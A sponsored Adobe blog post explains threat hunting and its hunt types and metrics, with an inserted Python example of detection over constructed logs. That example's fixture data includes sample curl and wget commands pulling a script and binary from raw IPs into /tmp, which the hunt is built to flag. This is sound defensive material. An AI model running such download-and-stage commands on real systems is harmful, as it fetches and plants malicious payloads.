Editor’s note: The following is a sponsored blog post from Adobe.
When many companies think about network security, they usually think in terms of firewalls, anti-virus software, intrusion detection systems, and multi-factor authentication (MFA). Once these preventative measures are in place, companies often centralize their monitoring and response processes by standing up a security operations center (SOC) that responds to alerts, including an incident response (IR) team tasked with mitigating and remediating any detected threats.
As a security organization matures, it can begin to invest resources in more sophisticated proactive security practices, such as threat hunting. At Adobe, that’s exactly what we’ve done, and we’d like to give you an inside look at the threat hunting program within our Security Coordination Center (SCC).
What is threat hunting?
Threat hunting is a “blue team” function that defends the enterprise from malicious activity that might have evaded existing security defenses. If you’re familiar with “blue” vs. “red” team terminology in the security space, blue teams are part of a company’s defensive security program, while red teams are part of an offensive security program, purposely attacking the enterprise to discover existing vulnerabilities before real malicious actors can.
The primary goal of a threat hunting program is to decrease the gap between an initial compromise and the discovery of an attack, something that’s called “dwell time.” The longer the bad actor goes undetected in an environment, the longer the dwell time and the longer they have to do damage.
More specifically, threat hunts can find previously undetected issues, including compromised or misconfigured hosts, visibility gaps, and other security risks. They can also help analyze and enhance the effectiveness of your detection mechanisms and processes, as well as provide post-hunt recommendations to improve security. Sometimes, they can discover new threats or tactics, techniques and procedures (TTPs) that lead to an entirely new hunt.
What should you look for?
So now that you know what threat hunting is, how do you know what to look for? Hunt ideas, or leads, can come from many sources within the organization. A primary source is your SOC, which likely observes emerging threat patterns during its day-to-day triage. Another source for hunt leads is the set of TTPs identified by your incident response team. These patterns of behavior can be used to help defend against specific threat vectors and strategies used by malicious actors. While your IR team may be limited to mitigating the incident itself, the threat hunting team can search for the same behavior with a wider lens to uncover a potentially similar attack elsewhere in the environment.
Other hunt ideas can come from outside your organization. There’s no shortage of external vulnerabilities these days, so it makes sense for your security organization to be vigilant for industry-wide exploitation attempts that leverage those vulnerabilities. Your threat hunting team can be a huge help in this regard. That team can also be tasked with searching for behavior observed in external threat or breach reports issued by security researchers and standards organizations, such as MITRE.
How are hunts structured?
Hunts typically fall into two distinct categories: structured and unstructured. While both start from a hypothesis, threat hunters use structured hunts when they have a specific TTP or behavior in mind from the beginning (such as bad actors using system-native tools like curl or wget on a compromised host to download additional malware or hack tools from the internet). Unauthorized access gained by hackers using the recent Log4j vulnerability was likely the subject of hunts at thousands of companies worldwide.
Unstructured hunts, on the other hand, focus on searching for anomalies or outliers in larger data sets and often involve data science techniques or ML/AI. For example, you might observe a change in DNS activity, where a process begins making requests to an unknown domain and decide it warrants further investigation. Alternatively, your threat hunting team might be searching through user activity logs and see an anomaly, such as a service attempting to access resources for which it does not have authorization.
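To make the two hunt styles concrete, here is an added example (not Adobe’s tooling, and not code from the original post) that runs a structured hunt and an unstructured hunt over small, constructed log samples. The structured hunt looks for the specific behavior described above: curl or wget fetching from a raw IP address or a domain outside an allow list. The unstructured hunt builds a per-host, per-process baseline of queried DNS names from an earlier period and flags later queries that fall outside it, which is the “process begins making requests to an unknown domain” case. The log formats, host names, the `TRUSTED_DOMAINS` allow list, and the baseline cutoff are all assumptions made for the example; the IP addresses are from the RFC 5737 documentation ranges.

```python
"""Two hunt queries over constructed log data (added example, not Adobe's code)."""
import ipaddress
import shlex
from collections import defaultdict
from urllib.parse import urlparse

# Constructed process-execution events: (host, user, parent_process, command_line).
PROCESS_EVENTS = [
    ("web-01", "www-data", "apache2", "curl -s http://203.0.113.10/x.sh -o /tmp/x.sh"),
    ("build-02", "jenkins", "bash", "wget https://pypi.org/simple/requests/"),
    ("web-01", "www-data", "apache2", "wget -q http://198.51.100.7:8080/a.elf -O /tmp/a"),
    ("db-01", "postgres", "cron", "pg_dump -U postgres app"),
    ("web-03", "root", "sshd", "curl -fsSL https://updates.example.com/patch.tar.gz"),
]

# Assumed allow list of download sources that are expected in this environment.
TRUSTED_DOMAINS = {"pypi.org", "updates.example.com"}
DOWNLOAD_TOOLS = {"curl", "wget"}


def _is_ip(host):
    """True if the URL host is a literal IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def structured_hunt(events, trusted=TRUSTED_DOMAINS):
    """Structured hunt: curl/wget fetching from a raw IP or an untrusted domain."""
    hits = []
    for host, user, parent, cmdline in events:
        try:
            argv = shlex.split(cmdline)
        except ValueError:
            continue  # unparseable command line; skip rather than crash the hunt
        # Strip any directory prefix so /usr/bin/curl matches too.
        if not argv or argv[0].rsplit("/", 1)[-1] not in DOWNLOAD_TOOLS:
            continue
        for arg in argv[1:]:
            if not arg.startswith(("http://", "https://")):
                continue
            netloc = urlparse(arg).hostname or ""
            if _is_ip(netloc) or netloc not in trusted:
                hits.append({"host": host, "user": user, "parent": parent, "url": arg})
                break
    return hits


# Constructed DNS query log: "<timestamp> <host> <process> <queried_name>" per line.
DNS_LOG = """\
2024-03-01T10:00:01Z web-01 nginx cdn.example.com
2024-03-01T10:00:05Z web-01 nginx cdn.example.com
2024-03-01T10:01:10Z web-01 nginx api.example.com
2024-03-01T10:02:00Z web-01 php-fpm api.example.com
2024-03-01T10:02:30Z build-02 python pypi.org
2024-03-01T10:03:00Z build-02 python files.pythonhosted.org
2024-03-02T03:14:00Z web-01 nginx cdn.example.com
2024-03-02T03:14:07Z web-01 php-fpm zq3k8d.example.net
2024-03-02T03:14:09Z build-02 python pypi.org
"""


def parse_dns_log(text):
    """Parse the constructed DNS log into (ts, host, process, qname) tuples."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            rows.append(tuple(parts))
    return rows


def unstructured_hunt(rows, baseline_cutoff):
    """Unstructured hunt: flag queries after the cutoff that a (host, process)
    pair never made during the baseline period. ISO-8601 UTC timestamps sort
    correctly as strings, so a plain comparison suffices here."""
    baseline = defaultdict(set)
    for ts, host, proc, qname in rows:
        if ts < baseline_cutoff:
            baseline[(host, proc)].add(qname)
    outliers = []
    for ts, host, proc, qname in rows:
        if ts >= baseline_cutoff and qname not in baseline[(host, proc)]:
            outliers.append({"ts": ts, "host": host, "process": proc, "domain": qname})
    return outliers


if __name__ == "__main__":
    for hit in structured_hunt(PROCESS_EVENTS):
        print("structured:", hit)
    for out in unstructured_hunt(parse_dns_log(DNS_LOG), "2024-03-02T00:00:00Z"):
        print("unstructured:", out)
```

The structured hunt is essentially a detection rule that can be promoted into the SOC’s tooling once it proves useful; the unstructured one produces leads that still need an analyst to decide whether a new domain is benign (a fresh CDN endpoint) or worth a deeper look, which is why it is hunting rather than alerting. In production both would run against a log store with far longer baselines and a maintained allow list.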
How do you measure success?
Just like other business processes, measuring the success of a threat hunting program can be broken into qualitative and quantitative aspects. On the qualitative side, overlaying your hunts on the MITRE ATT&CK framework, which is the “gold standard” for profiling attackers, can give you an overall idea of how well you’re protecting your company against common attacks. New detection analytics, such as detection rules, and security recommendations that result from hunts also improve the company’s existing detection and prevention capabilities.
Quantitatively, keeping track of the number of incidents, compromised hosts, misconfigurations and the like that your threat hunting program has discovered before damage has been done is a good metric to measure success. Reducing the dwell time of incidents and the completion time for hunts can also help demonstrate the need for and success of your threat hunting program to management. Using analytics software, you can also measure a variety of additional and company-specific metrics and KPIs.
A proactive approach
At Adobe, we’ve built a scalable threat hunting program that provides early detection of potential harm, reduces dwell time for information security incidents, delivers guidance on how to mitigate potential harm to Adobe’s customers, brand, or products, and helps us educate our peers in how to improve at both recognizing and addressing possible threats. By proactively hunting for advanced threats, the hunt team adds an additional layer to Adobe’s defense-in-depth posture and provides constant feedback to help improve our cybersecurity controls.